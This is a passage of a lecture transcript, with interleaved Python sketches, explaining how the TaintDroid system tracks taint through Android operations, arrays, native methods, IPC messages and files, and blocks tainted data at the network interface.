00:20:07,030 --> 00:20:10,320
You basically take
all of the bits that

429
00:20:10,320 --> 00:20:12,970
are set in either one of
those and then assign that

430
00:20:12,970 --> 00:20:15,444
to the taint tag for this one.

431
00:20:15,444 --> 00:20:16,610
AUDIENCE: All right, thanks.

432
00:20:16,610 --> 00:20:17,776
PROFESSOR: Yeah, no problem.

433
00:20:17,776 --> 00:20:20,940
And so one reason-- so once
again I should emphasize this,

434
00:20:20,940 --> 00:20:24,390
so since we can represent all
the possible taints in this 32

435
00:20:24,390 --> 00:20:26,590
bits, as we were
just discussing,

436
00:20:26,590 --> 00:20:28,999
doing this operation here,
it's just bitwise operations.

437
00:20:28,999 --> 00:20:31,040
So this actually really
cuts down on the overhead

438
00:20:31,040 --> 00:20:32,500
from implementing
these taint bits.

439
00:20:32,500 --> 00:20:35,160
If you had to express a
larger universe of taints then

440
00:20:35,160 --> 00:20:37,076
you might be in trouble,
because you might not

441
00:20:37,076 --> 00:20:39,070
be able to use these
very efficient bitwise

442
00:20:39,070 --> 00:20:41,440
operations to do things.
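
A minimal sketch of the move-op and binary-op rules just described, assuming each value carries a 32-bit integer tag with one bit per taint source. The bit assignments (TAINT_GPS, TAINT_CONTACTS, TAINT_PHONE_NUMBER) and the function names are hypothetical and chosen for illustration; they are not TaintDroid's actual constants.

```python
# Hypothetical bit assignments: one bit per sensitive source.
TAINT_CLEAR = 0
TAINT_GPS = 1 << 0
TAINT_CONTACTS = 1 << 1
TAINT_PHONE_NUMBER = 1 << 2

MASK_32 = 0xFFFFFFFF  # tags are modeled as 32-bit integers


def move_op_taint(src_tag):
    """move-op: dest takes exactly the tag of src."""
    return src_tag & MASK_32


def binary_op_taint(src0_tag, src1_tag):
    """binary-op: dest gets the union (bitwise OR) of both source tags."""
    return (src0_tag | src1_tag) & MASK_32


# Two sources that overlap in one bit.
src0 = TAINT_GPS | TAINT_CONTACTS
src1 = TAINT_CONTACTS | TAINT_PHONE_NUMBER
dest = binary_op_taint(src0, src1)  # every bit set in either source
```

Because the union is a single OR instruction on a machine word, the per-operation cost stays small, which is the efficiency point made above.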

443
00:20:41,440 --> 00:20:44,051
Any other questions about that?

444
00:20:44,051 --> 00:20:44,550
OK.

445
00:20:47,270 --> 00:20:50,212
So the way that arrays work is
a little bit like that binary op

446
00:20:50,212 --> 00:20:50,920
like I mentioned.

447
00:20:50,920 --> 00:20:53,010
So this is going
to get the union

448
00:20:53,010 --> 00:20:56,290
of the taint of this and that.

449
00:20:56,290 --> 00:20:59,950
And so one design decision
that they made in TaintDroid

450
00:20:59,950 --> 00:21:07,741
is that they associate a single
taint tag with each array.

451
00:21:07,741 --> 00:21:09,240
So in other words,
they're not going

452
00:21:09,240 --> 00:21:13,492
to try to taint all the
individual elements in there.

453
00:21:13,492 --> 00:21:14,950
So basically what's
going to end up

454
00:21:14,950 --> 00:21:19,660
happening is that this is going
to save them storage space,

455
00:21:19,660 --> 00:21:21,452
right, because for each
array they declare,

456
00:21:21,452 --> 00:21:23,118
they'll just have a
single 32-bit

457
00:21:23,118 --> 00:21:25,250
integer that sort of
floats around that array

458
00:21:25,250 --> 00:21:28,550
and represents all the taint
that belongs to that array.

459
00:21:32,270 --> 00:21:34,170
There is one
question about why is

460
00:21:34,170 --> 00:21:40,010
it safe to not have a finer
grain system for taint.

461
00:21:40,010 --> 00:21:43,110
Because it seems like an
array is a collection of data,

462
00:21:43,110 --> 00:21:45,680
so why shouldn't we have a
bunch of labels flying around

463
00:21:45,680 --> 00:21:48,010
for each thing
that's in that array?

464
00:21:48,010 --> 00:21:51,190
And so the answer to
that is that by only

465
00:21:51,190 --> 00:21:53,380
associating one taint
tag with the array

466
00:21:53,380 --> 00:21:56,910
and making it the union of
all the things that are inside,

467
00:21:56,910 --> 00:22:00,500
that actually is going
to overestimate taint.

468
00:22:00,500 --> 00:22:02,590
So in other words, if
you have an array that

469
00:22:02,590 --> 00:22:04,580
has two items in
it, and that array

470
00:22:04,580 --> 00:22:06,640
is tainted with the union
of all of those things,

471
00:22:06,640 --> 00:22:09,930
well, that's probably a little
bit-- it's conservative.

472
00:22:09,930 --> 00:22:12,270
Because it may be that if
something only accesses this,

473
00:22:12,270 --> 00:22:14,186
maybe it didn't learn
anything about the taint

474
00:22:14,186 --> 00:22:15,070
that was over here.

475
00:22:15,070 --> 00:22:17,720
But by being
conservative, hopefully we

476
00:22:17,720 --> 00:22:19,607
will always be correct.

477
00:22:19,607 --> 00:22:21,065
In other words, if
we underestimate

478
00:22:21,065 --> 00:22:22,620
the amount of taint
that something had,

479
00:22:22,620 --> 00:22:24,540
then we might accidentally
disclose something

480
00:22:24,540 --> 00:22:26,248
that we didn't want
to actually disclose.

481
00:22:26,248 --> 00:22:28,570
But if we overestimate,
then in the worst case,

482
00:22:28,570 --> 00:22:31,700
maybe we prevent something from
going outside of the phone that

483
00:22:31,700 --> 00:22:33,380
should actually be
OK, but we're going

484
00:22:33,380 --> 00:22:35,027
to err on the side of safety.

485
00:22:35,027 --> 00:22:36,110
Does that all make sense?
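
A rough sketch of the one-tag-per-array design, assuming taint tags are plain integers used as bit sets. The class name TaintedArray, its methods, and the TAINT_GPS bit are hypothetical; the point is only to show how a shared tag overestimates taint on reads.

```python
TAINT_GPS = 1 << 0  # hypothetical bit for location data


class TaintedArray:
    """An array that carries one taint tag for all of its elements."""

    def __init__(self, length):
        self.items = [0] * length
        self.tag = 0  # single tag shared by every element

    def store(self, index, value, value_tag):
        # Storing a tainted value taints the whole array.
        self.items[index] = value
        self.tag |= value_tag

    def load(self, index, index_tag=0):
        # The loaded value gets the union of the array's tag and the index's tag.
        return self.items[index], self.tag | index_tag


arr = TaintedArray(2)
arr.store(0, 42, TAINT_GPS)  # tainted element
arr.store(1, 7, 0)           # untainted element
value, tag = arr.load(1)     # reading the untainted slot still yields the GPS bit
```

Reading element 1 reports GPS taint even though only element 0 held location data. That is the conservative overestimate: it may block something harmless, but it does not drop a taint bit that was stored.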

486
00:22:38,790 --> 00:22:43,910
Another instance of-- a
sort of special case taint

487
00:22:43,910 --> 00:22:49,825
propagation that they mention
are things like native methods.

488
00:22:54,120 --> 00:22:57,570
And so native methods
might exist inside of the VM

489
00:22:57,570 --> 00:23:02,360
itself, so for example, the
Dalvik VM exposes some function

490
00:23:02,360 --> 00:23:08,120
like a System.arraycopy(), so
we can pass in anything through

491
00:23:08,120 --> 00:23:13,270
this, and internal to the VM,
this is implemented in C or C++

492
00:23:13,270 --> 00:23:15,750
code for reasons of speed.

493
00:23:15,750 --> 00:23:18,510
That's one type of example of
a native method you might have.

494
00:23:18,510 --> 00:23:22,950
Another thing you might
have, a type of native method

495
00:23:22,950 --> 00:23:28,800
is what they call
JNI-exposed methods.

496
00:23:28,800 --> 00:23:31,310
So the native
interface essentially

497
00:23:31,310 --> 00:23:35,330
allows Java code
to call into code

498
00:23:35,330 --> 00:23:38,492
that is not Java, that's
implemented using x86 or ARM

499
00:23:38,492 --> 00:23:39,450
or something like that.

500
00:23:39,450 --> 00:23:41,350
There's a whole
calling convention

501
00:23:41,350 --> 00:23:43,600
that's exposed here to allow
those two types of stacks

502
00:23:43,600 --> 00:23:45,330
to interoperate.

503
00:23:45,330 --> 00:23:49,460
And so the problem with
these native code methods,

504
00:23:49,460 --> 00:23:52,370
from the perspective
of tracking taint,

505
00:23:52,370 --> 00:23:57,440
is that this native code is
not being executed directly

506
00:23:57,440 --> 00:23:59,540
by the Dalvik interpreter.

507
00:23:59,540 --> 00:24:03,400
In fact, it is often not even
Java code, maybe C or C++ code.

508
00:24:03,400 --> 00:24:06,300
So that means that once
execution flow goes

509
00:24:06,300 --> 00:24:09,020
into one of these
native methods,

510
00:24:09,020 --> 00:24:12,690
TaintDroid can't do any
of this taint propagation

511
00:24:12,690 --> 00:24:17,010
that it's doing for code
that lives in the Java world.

512
00:24:17,010 --> 00:24:18,930
So that seems a
little bit problematic

513
00:24:18,930 --> 00:24:21,630
because these things are
kind of like black boxes.

514
00:24:21,630 --> 00:24:25,360
You want to make sure that
when these methods return,

515
00:24:25,360 --> 00:24:28,640
we can actually
somehow represent

516
00:24:28,640 --> 00:24:30,720
the new taint that was
created by the execution

517
00:24:30,720 --> 00:24:31,690
of those methods.

518
00:24:31,690 --> 00:24:38,490
And so the way that the
authors solve this issue is,

519
00:24:38,490 --> 00:24:42,980
they essentially resort
to manual analysis.

520
00:24:46,160 --> 00:24:49,890
So they basically say,
there are not a whole lot

521
00:24:49,890 --> 00:24:51,890
of these types of methods here.

522
00:24:51,890 --> 00:24:55,430
So for example, the Dalvik VM
only exposes a certain number

523
00:24:55,430 --> 00:24:57,290
of functions like
System.arraycopy(),

524
00:24:57,290 --> 00:25:00,080
so we as human developers can
look through this relatively

525
00:25:00,080 --> 00:25:03,860
small number of calls and
essentially figure out what

526
00:25:03,860 --> 00:25:05,560
the taint relationship
should be.

527
00:25:05,560 --> 00:25:08,424
So for example, they can look
at something like array copy

528
00:25:08,424 --> 00:25:09,840
and say, OK, based
on what we know

529
00:25:09,840 --> 00:25:11,840
the semantics of
this operation are,

530
00:25:11,840 --> 00:25:13,950
we know that we should
taint the return values

531
00:25:13,950 --> 00:25:15,960
from this function
in a certain way

532
00:25:15,960 --> 00:25:19,660
given the input values
to this function.

533
00:25:19,660 --> 00:25:22,700
And so how well does this scale?

534
00:25:22,700 --> 00:25:25,690
Well, if there are in
fact only a small number

535
00:25:25,690 --> 00:25:30,300
of things exposed by, for
example, the VM in native code,

536
00:25:30,300 --> 00:25:31,960
this actually works OK.

537
00:25:31,960 --> 00:25:34,410
Because if you assume that the
Dalvik VM interface doesn't

538
00:25:34,410 --> 00:25:36,640
change very often,
then it's actually not

539
00:25:36,640 --> 00:25:39,300
too burdensome to look at these
things, view the documentation,

540
00:25:39,300 --> 00:25:43,350
and figure out how
taint's going to spread.

541
00:25:43,350 --> 00:25:46,541
This may or may not
be more troublesome.

542
00:25:46,541 --> 00:25:48,790
They give some empirical
data that suggests that a lot

543
00:25:48,790 --> 00:25:51,100
of applications
are not, in fact,

544
00:25:51,100 --> 00:25:56,075
including code alongside of
them that's actually going

545
00:25:56,075 --> 00:25:58,307
to execute in C or C++.

546
00:25:58,307 --> 00:26:00,140
So they argued that
empirically, this is not

547
00:26:00,140 --> 00:26:01,223
going to be a big problem.

548
00:26:01,223 --> 00:26:05,840
They also argue that for certain
types of method signatures,

549
00:26:05,840 --> 00:26:09,900
you can actually automate
the way in which these taint

550
00:26:09,900 --> 00:26:11,160
calculations are done.

551
00:26:11,160 --> 00:26:14,210
So they say that, for example,
if only integers or strings are

552
00:26:14,210 --> 00:26:17,000
passed in to some of these
native functions here, then

553
00:26:17,000 --> 00:26:20,150
we can just do the standard
thing of tagging the output

554
00:26:20,150 --> 00:26:23,389
value with the union of all
the taints of the inputs.

555
00:26:23,389 --> 00:26:25,430
So in practice, it seems
like this isn't probably

556
00:26:25,430 --> 00:26:27,315
going to be too big
of a problem here.
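
A small sketch of the automated rule for simple native signatures: treat the native function as a black box and tag its result with the union of the argument tags. The helper name call_native and the taint bits are hypothetical, and Python's built-in max stands in for an opaque native function.

```python
TAINT_GPS = 1 << 0       # hypothetical bit for location data
TAINT_CONTACTS = 1 << 1  # hypothetical bit for contact data


def call_native(native_fn, tagged_args):
    """Call an opaque native function and tag its result conservatively.

    tagged_args is a list of (value, tag) pairs.
    """
    values = [value for value, _ in tagged_args]
    result = native_fn(*values)  # black box: no tracking happens inside
    result_tag = 0
    for _, tag in tagged_args:
        result_tag |= tag  # union of all input taints
    return result, result_tag


# max() plays the role of a native method taking only simple values.
result, result_tag = call_native(max, [(3, TAINT_GPS), (9, TAINT_CONTACTS)])
```

The result here depends only on the second argument, yet it carries both bits. Methods whose semantics differ from this default would still need a hand-written rule, which is the manual part discussed in the lecture.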

557
00:26:27,315 --> 00:26:30,780
AUDIENCE: But why couldn't
you just scan-- whatever

558
00:26:30,780 --> 00:26:33,750
scans your code [INAUDIBLE]?

559
00:26:36,720 --> 00:26:39,610
PROFESSOR: Oh yeah, so in
practice, what do they do.

560
00:26:39,610 --> 00:26:43,610
So they know that whenever the
interpreter is going to execute

561
00:26:43,610 --> 00:26:46,410
something like this, then when
the return value comes back,

562
00:26:46,410 --> 00:26:49,130
they do have special case code
that's going to automagically

563
00:26:49,130 --> 00:26:52,750
say return values of
System.arraycopy() should have

564
00:26:52,750 --> 00:26:54,149
this taint assigned to it.

565
00:26:54,149 --> 00:26:56,190
AUDIENCE: Right, so what's
the manual part of it?

566
00:26:56,190 --> 00:26:57,545
PROFESSOR: Oh, the
manual part of it

567
00:26:57,545 --> 00:27:00,260
is figuring out what that policy
should be in the first place.

568
00:27:00,260 --> 00:27:03,450
So in other words, if you
just look at off the shelf

569
00:27:03,450 --> 00:27:05,255
Taint or off the
shelf Android, this

570
00:27:05,255 --> 00:27:06,630
is going to do
something for you,

571
00:27:06,630 --> 00:27:08,380
but it's not going to
automatically assign

572
00:27:08,380 --> 00:27:09,630
taint in the right way.

573
00:27:09,630 --> 00:27:11,130
So someone looks
at this and figures

574
00:27:11,130 --> 00:27:12,990
out what that policy is.

575
00:27:12,990 --> 00:27:13,490
Make sense?

576
00:27:13,490 --> 00:27:15,584
Any other questions?

577
00:27:15,584 --> 00:27:17,000
It doesn't look
like this is going

578
00:27:17,000 --> 00:27:23,210
to be a big problem in practice,
although you can imagine that,

579
00:27:23,210 --> 00:27:26,120
for example, if there
was this increasing

580
00:27:26,120 --> 00:27:29,280
amount of applications that
define these native outcalls,

581
00:27:29,280 --> 00:27:32,841
then we could be in a
little bit of a problem.

582
00:27:32,841 --> 00:27:33,340
All right.

583
00:27:38,790 --> 00:27:42,780
So another type of
data that we have

584
00:27:42,780 --> 00:27:49,290
to worry about assigning
taint to is IPC messages.

585
00:27:49,290 --> 00:27:53,257
And so IPC messages
are essentially

586
00:27:53,257 --> 00:27:54,090
treated like arrays.

587
00:27:56,610 --> 00:28:01,790
So each one of these
messages is going

588
00:28:01,790 --> 00:28:04,310
to be associated with
a single taint that

589
00:28:04,310 --> 00:28:08,230
is the union of the taint of
all the constituent parts.

590
00:28:08,230 --> 00:28:09,900
Once again, this
helps with efficiency

591
00:28:09,900 --> 00:28:13,140
because we only have
to store one taint tag

592
00:28:13,140 --> 00:28:15,360
for each one of these messages.

593
00:28:15,360 --> 00:28:17,860
And in the worst case,
this is conservative,

594
00:28:17,860 --> 00:28:19,170
it overestimates taint.

595
00:28:19,170 --> 00:28:21,727
But that should never
result in a security leak.

596
00:28:21,727 --> 00:28:23,560
At worst, it should
only result in something

597
00:28:23,560 --> 00:28:25,650
that should have been able to
go over the network not being

598
00:28:25,650 --> 00:28:27,030
able to go on the network.

599
00:28:30,110 --> 00:28:32,730
This is how things work
when you're constructing

600
00:28:32,730 --> 00:28:34,800
the message, so
that message gets

601
00:28:34,800 --> 00:28:36,880
the union of all the
taint of its components.

602
00:28:36,880 --> 00:28:40,570
Then when you're
reading it, what you

603
00:28:40,570 --> 00:28:46,500
receive in the message--
so extracted data

604
00:28:46,500 --> 00:28:52,560
gets the taint of the message
itself, which makes sense.

605
00:28:55,240 --> 00:28:57,200
So that's how IPC
messages are treated.

606
00:28:57,200 --> 00:29:03,000
Another resource you might worry
about is how files are handled.

607
00:29:03,000 --> 00:29:10,160
So once again each file
gets a single taint tag,

608
00:29:10,160 --> 00:29:11,770
and that tag is
essentially stored

609
00:29:11,770 --> 00:29:14,970
alongside the file in its
metadata on stable storage

610
00:29:14,970 --> 00:29:17,219
like the SD card or whatever.

611
00:29:17,219 --> 00:29:19,260
So this is basically the
same conservative scheme

612
00:29:19,260 --> 00:29:20,360
that we've seen before.

613
00:29:20,360 --> 00:29:25,030
So the basic idea is that
the application accesses

614
00:29:25,030 --> 00:29:27,090
some sensitive data like,
for example, your GPS

615
00:29:27,090 --> 00:29:31,710
location, maybe it's going
to write that data to a file.

616
00:29:31,710 --> 00:29:34,730
So TaintDroid updates
that file's taint tag

617
00:29:34,730 --> 00:29:38,700
with the GPS flag, maybe
the application closes down,

618
00:29:38,700 --> 00:29:42,940
later on some other application
comes along, it reads that file.

619
00:29:42,940 --> 00:29:46,700
When it comes into the
VM, into the application,

620
00:29:46,700 --> 00:29:48,200
TaintDroid will
look and see that it

621
00:29:48,200 --> 00:29:52,150
has that flag marked,
and so any data that's

622
00:29:52,150 --> 00:29:55,550
derived from reading that file
will also have that GPS flag

623
00:29:55,550 --> 00:29:56,240
set.

624
00:29:56,240 --> 00:29:59,590
So pretty
straightforward, I think.
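
A toy sketch of per-file taint, assuming one integer tag per file kept next to the file's contents. The dictionaries file_contents and file_tags stand in for the file system and its metadata, and all names and the sample coordinates are hypothetical.

```python
TAINT_GPS = 1 << 0  # hypothetical bit for location data

file_contents = {}
file_tags = {}  # stands in for per-file metadata on stable storage


def write_file(path, data, data_tag):
    """Append data and fold its taint into the file's single tag."""
    file_contents[path] = file_contents.get(path, "") + data
    file_tags[path] = file_tags.get(path, 0) | data_tag


def read_file(path):
    """Everything read from the file inherits the file's tag."""
    return file_contents[path], file_tags.get(path, 0)


# One application writes a location to a file and exits.
write_file("/sdcard/cache.txt", "42.36,-71.09", TAINT_GPS)
# Later, a different application reads the same file.
data, data_tag = read_file("/sdcard/cache.txt")
```

The tag outlives the writing application because it lives with the file, so the second reader's data comes back already marked with the GPS bit.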

625
00:29:59,590 --> 00:30:04,410
So what kind of
things do we have

626
00:30:04,410 --> 00:30:07,170
to taint in terms of Java state?

627
00:30:07,170 --> 00:30:15,990
So there are basically five
types of Java objects

628
00:30:15,990 --> 00:30:19,570
that need taint flags.

629
00:30:23,190 --> 00:30:31,330
And so the first kind of
thing is local variables

630
00:30:31,330 --> 00:30:34,370
that live in a method.

631
00:30:34,370 --> 00:30:37,430
So we can imagine
back over here,

632
00:30:37,430 --> 00:30:40,110
this is a local variable,
char c, for example.

633
00:30:40,110 --> 00:30:44,560
So we have to assign taint
flags to those things.

634
00:30:44,560 --> 00:30:50,560
You can also imagine
that method arguments

635
00:30:50,560 --> 00:30:52,440
need to have taint flags.

636
00:30:52,440 --> 00:30:59,030
Both of these things here,
these live in a stack.

637
00:31:03,280 --> 00:31:06,090
So TaintDroid has to keep
track of assigning flags

638
00:31:06,090 --> 00:31:08,070
and whatnot for those
types of things.

639
00:31:08,070 --> 00:31:15,460
Also we need to assign flags
to object instance fields.

640
00:31:19,980 --> 00:31:24,670
And so this is like, imagine
that I have some object called

641
00:31:24,670 --> 00:31:28,166
c, it's a circle so of
course the proper thing to do

642
00:31:28,166 --> 00:31:29,730
is I want to look at its radius.

643
00:31:29,730 --> 00:31:31,520
Here's a field here.

644
00:31:31,520 --> 00:31:36,690
And so we have to associate
taint information for each one

645
00:31:36,690 --> 00:31:39,030
of these fields here.

646
00:31:39,030 --> 00:31:46,660
Java also allows you to
have a static class field,

647
00:31:46,660 --> 00:31:50,300
and so you need taint
information for those.

648
00:31:50,300 --> 00:31:56,030
This is saying something like,
for example, maybe the circle

649
00:31:56,030 --> 00:31:59,200
dot some property, OK,
we'll assign some taint

650
00:31:59,200 --> 00:32:00,530
information there.

651
00:32:00,530 --> 00:32:04,080
Then arrays, as we've
already discussed before,

652
00:32:04,080 --> 00:32:07,750
we'll assign one piece
of taint information

653
00:32:07,750 --> 00:32:09,350
per that entire array.

654
00:32:09,350 --> 00:32:12,030
And so the basic
idea for how we're

655
00:32:12,030 --> 00:32:15,450
going to store these taint flags
at the implementation level,

656
00:32:15,450 --> 00:32:21,887
is that we're going to try
to basically store the taint

657
00:32:21,887 --> 00:32:27,560
flags for a variable
near the variable itself.

658
00:32:33,620 --> 00:32:38,170
The basic idea here is
we've got, for example,

659
00:32:38,170 --> 00:32:40,070
let's say some integer
variable, and we

660
00:32:40,070 --> 00:32:42,740
want to store some
taint state with that.

661
00:32:42,740 --> 00:32:45,430
We want to try to keep that
state as close to the variable

662
00:32:45,430 --> 00:32:47,660
as possible for reasons
of making the cache

663
00:32:47,660 --> 00:32:50,420
work efficiently at
the processor level.

664
00:32:50,420 --> 00:32:52,790
So if we were to
store taint very far

665
00:32:52,790 --> 00:32:54,376
away from that
variable, that can

666
00:32:54,376 --> 00:32:56,640
be problematic because
probably, the interpreter

667
00:32:56,640 --> 00:32:59,250
is going to look at the memory
value for the actual Java

668
00:32:59,250 --> 00:32:59,860
variable.

669
00:32:59,860 --> 00:33:02,310
It's going to want to very
quickly thereafter, or even

670
00:33:02,310 --> 00:33:04,990
before that, look and see
what the taint information is.

671
00:33:04,990 --> 00:33:09,566
Because if you look at
these operations here,

672
00:33:09,566 --> 00:33:10,940
the same places
in the code where

673
00:33:10,940 --> 00:33:12,280
the interpreter's
looking at the values,

674
00:33:12,280 --> 00:33:13,710
it's also looking at taint.

675
00:33:13,710 --> 00:33:17,710
Basically by storing these
things close to each other,

676
00:33:17,710 --> 00:33:19,880
you try to make the
cache behavior better.

677
00:33:19,880 --> 00:33:22,840
And the way that they
do this is actually

678
00:33:22,840 --> 00:33:25,520
pretty straightforward.

679
00:33:25,520 --> 00:33:30,660
So if you look at what they
do for method arguments

680
00:33:30,660 --> 00:33:32,500
and local variables
that live on a stack,

681
00:33:32,500 --> 00:33:36,390
they essentially
allocate the taint flags

682
00:33:36,390 --> 00:33:39,330
right next to where the
variables are allocated.

683
00:33:39,330 --> 00:33:44,860
So let's say that we have our
favorite thing in this class,

684
00:33:44,860 --> 00:33:47,360
a stack diagram,
which you'll probably

685
00:33:47,360 --> 00:33:49,110
hate after you get out of here.

686
00:33:49,110 --> 00:33:56,740
So you've got some local
variable 0 on the stack,

687
00:33:56,740 --> 00:33:59,220
and then what
TaintDroid will do is

688
00:33:59,220 --> 00:34:02,270
it will store the taint
tag for that variable

689
00:34:02,270 --> 00:34:05,540
right next to where that
local variable is in memory.

690
00:34:05,540 --> 00:34:10,810
So similarly, if you had
another local variable here,

691
00:34:10,810 --> 00:34:16,900
then you would see its
taint tag right down here.

692
00:34:16,900 --> 00:34:19,362
So on and so forth.

693
00:34:19,362 --> 00:34:20,320
Pretty straightforward.

694
00:34:20,320 --> 00:34:22,567
So hopefully you
get these things

695
00:34:22,567 --> 00:34:25,150
in the same cache line, that's
going to make the accesses very

696
00:34:25,150 --> 00:34:25,671
cheap.
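
A loose sketch of the interleaved stack layout, assuming each local variable slot is followed immediately by its tag slot. A Python list only models the ordering, not real cache lines, and the helper names build_frame and read_local are hypothetical.

```python
TAINT_GPS = 1 << 0  # hypothetical bit for location data


def build_frame(local_values, local_tags):
    """Lay out a frame as [var0, tag0, var1, tag1, ...]."""
    frame = []
    for value, tag in zip(local_values, local_tags):
        frame.append(value)
        frame.append(tag)
    return frame


def read_local(frame, n):
    # Value and tag sit in adjacent slots, so both come from the same region.
    return frame[2 * n], frame[2 * n + 1]


frame = build_frame([10, 20], [0, TAINT_GPS])
value, tag = read_local(frame, 1)
```

With this ordering, fetching local variable n and its tag touches two neighboring slots, which is what makes it likely that both land in the same cache line on real hardware.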

697
00:34:25,671 --> 00:34:26,170
Yeah?

698
00:34:26,170 --> 00:34:28,094
AUDIENCE: I was just
wondering, how can you

699
00:34:28,094 --> 00:34:30,350
have a single flag
for an entire array

700
00:34:30,350 --> 00:34:33,810
and a different flag for
every property of an object.

701
00:34:33,810 --> 00:34:38,080
What if one of the
methods of the object

702
00:34:38,080 --> 00:34:41,023
can access data which is
stored in its properties.

703
00:34:41,023 --> 00:34:42,895
That would like--
know what I mean?

704
00:34:42,895 --> 00:34:44,190
PROFESSOR: Let's see.

705
00:34:44,190 --> 00:34:47,030
So you're asking as
a policy reason, why?

706
00:34:47,030 --> 00:34:48,530
AUDIENCE: As a
policy reason, right.

707
00:34:48,530 --> 00:34:51,840
PROFESSOR: So I think some of
this they do for implementation

708
00:34:51,840 --> 00:34:53,489
efficiency reasons.

709
00:34:53,489 --> 00:34:56,530
I think that for the case--
so they have some other rules,

710
00:34:56,530 --> 00:34:57,030
too.

711
00:34:57,030 --> 00:35:00,232
For example, they say that they
don't think the length of the data

712
00:35:00,232 --> 00:35:02,750
array is actually going
to leak information,

713
00:35:02,750 --> 00:35:04,700
so they don't propagate
taint for that.

714
00:35:04,700 --> 00:35:07,000
So some of it is just for
reasons of efficiency.

715
00:35:07,000 --> 00:35:09,820
I think that in principle, that
there's nothing that stops you

716
00:35:09,820 --> 00:35:14,450
from saying, take every
element in the array

717
00:35:14,450 --> 00:35:16,636
and, when you do some
particular access on it,

718
00:35:16,636 --> 00:35:18,760
then you just say the thing
on the left hand side's

719
00:35:18,760 --> 00:35:21,741
going to get the
taint of only that item.

720
00:35:21,741 --> 00:35:23,740
It's not completely clear
that's the right thing

721
00:35:23,740 --> 00:35:25,910
to do, though,
because presumably

722
00:35:25,910 --> 00:35:28,980
in getting that thing into
the array in the first place,

723
00:35:28,980 --> 00:35:30,930
the thing that did that
had to know something

724
00:35:30,930 --> 00:35:32,851
about the array in some way.

725
00:35:32,851 --> 00:35:35,100
So I think it's a combination
of both policy reasons--

726
00:35:35,100 --> 00:35:38,060
they think that by being
overly conservative,

727
00:35:38,060 --> 00:35:42,200
you shouldn't allow any data
leaks that you want to prevent.

728
00:35:42,200 --> 00:35:44,740
And also I think that it
kind of does intuitively

729
00:35:44,740 --> 00:35:47,035
make sense that
accessing an array,

730
00:35:47,035 --> 00:35:49,160
you should have to know
something about that array.

731
00:35:49,160 --> 00:35:50,740
And when you have to know
something about something,

732
00:35:50,740 --> 00:35:52,948
that typically means that
you want to get tainted by it.

733
00:35:54,810 --> 00:35:57,210
Any other questions?

734
00:35:57,210 --> 00:35:59,425
OK, so this is the
basic scheme that they

735
00:35:59,425 --> 00:36:02,830
use for essentially storing
all of this information close

736
00:36:02,830 --> 00:36:03,500
to each other.

737
00:36:03,500 --> 00:36:05,300
So you can imagine
that for class fields

738
00:36:05,300 --> 00:36:07,440
and for object fields,
you do a similar thing.

739
00:36:07,440 --> 00:36:09,280
So in the declaration
of the class,

740
00:36:09,280 --> 00:36:12,580
you've got some slot in memory for
a particular instance variable,

741
00:36:12,580 --> 00:36:14,530
and then right next
to that slot you

742
00:36:14,530 --> 00:36:18,660
have the taint information
for that particular variable.

743
00:36:18,660 --> 00:36:21,380
So I think that's all
pretty reasonable.

744
00:36:22,860 --> 00:36:26,780
That's kind of a high level
overview of how TaintDroid

745
00:36:26,780 --> 00:36:30,990
works, so if you get all
this, then the basic idea

746
00:36:30,990 --> 00:36:33,900
behind TaintDroid is
actually pretty simple.

747
00:36:33,900 --> 00:36:37,900
So at system initialization
time or whatever,

748
00:36:37,900 --> 00:36:41,660
TaintDroid looks at all these
sources of potentially tainted

749
00:36:41,660 --> 00:36:43,880
information, and
essentially assigns a flag

750
00:36:43,880 --> 00:36:45,046
to each one of these things.

751
00:36:45,046 --> 00:36:47,940
So things like your GPS, your
camera, and so on and so forth.

752
00:36:47,940 --> 00:36:50,243
As the program
executes, it's going

753
00:36:50,243 --> 00:36:51,670
to pull out
sensitive information

754
00:36:51,670 --> 00:36:54,720
from these sensitive sources,
and then as that kind of thing

755
00:36:54,720 --> 00:36:56,460
happens, the
interpreter is going

756
00:36:56,460 --> 00:36:58,043
to look at all these
types of op codes

757
00:36:58,043 --> 00:37:01,640
here and basically
follow those policy

758
00:37:01,640 --> 00:37:03,653
rules in the table in
the paper, and figure out

759
00:37:03,653 --> 00:37:06,780
how to propagate taint
through the system.

760
00:37:06,780 --> 00:37:08,990
So the most interesting
part is what

761
00:37:08,990 --> 00:37:12,570
happens if data attempts
to exfiltrate itself.

762
00:37:12,570 --> 00:37:15,660
So essentially, TaintDroid can
sit at the network interfaces

763
00:37:15,660 --> 00:37:18,320
and they can see everything that
tries to go over the network

764
00:37:18,320 --> 00:37:18,944
interface.

765
00:37:18,944 --> 00:37:20,610
We actually look at
the taint tags there

766
00:37:20,610 --> 00:37:24,520
and we can say if data that's
trying to leave the network

767
00:37:24,520 --> 00:37:29,070
has one or more taint
flags, then we will say no.

768
00:37:29,070 --> 00:37:32,060
That data will not be
allowed to go over the network.

769
00:37:32,060 --> 00:37:35,175
Now what happens at
that point is actually

770
00:37:35,175 --> 00:37:37,090
kind of application-dependent.

771
00:37:37,090 --> 00:37:39,730
You could imagine that
TaintDroid shows an alert

772
00:37:39,730 --> 00:37:41,690
to the user which
says hey, somebody's

773
00:37:41,690 --> 00:37:44,859
trying to send your
location over the network.

774
00:37:44,859 --> 00:37:46,650
You could imagine that
maybe TaintDroid has

775
00:37:46,650 --> 00:37:49,380
some policies that are
built in which, for example,

776
00:37:49,380 --> 00:37:51,390
maybe it allows that
network flow to go out,

777
00:37:51,390 --> 00:37:53,610
but it zeros out all
that sensitive data,

778
00:37:53,610 --> 00:37:54,620
so on and so forth.
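
A minimal sketch of the check at the network sink, assuming integer taint tags where zero means untainted. As noted above, the response to a tainted send is a policy choice; this sketch simply blocks it. The names BlockedByTaint and send_over_network, the transmit callback, and the sample payloads are hypothetical.

```python
TAINT_GPS = 1 << 0  # hypothetical bit for location data


class BlockedByTaint(Exception):
    """Raised when tainted data reaches the network sink."""


def send_over_network(payload, payload_tag, transmit):
    # Sink check: any set bit means the data derives from a sensitive source.
    if payload_tag != 0:
        raise BlockedByTaint(f"refusing to send data with tag {payload_tag:#x}")
    transmit(payload)


sent = []     # stands in for the wire
blocked = False
send_over_network("hello", 0, sent.append)
try:
    send_over_network("42.36,-71.09", TAINT_GPS, sent.append)
except BlockedByTaint:
    blocked = True
```

Swapping the raise for a user alert, or for zeroing the payload before transmitting, would give the other policies mentioned in the lecture without changing the check itself.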

779
00:37:54,620 --> 00:37:56,895
That's from a certain
perspective, a little bit

780
00:37:56,895 --> 00:37:57,850
orthogonal to the
core contribution

781
00:37:57,850 --> 00:38:00,250
of the paper, which is to
find those data exfiltrations

782
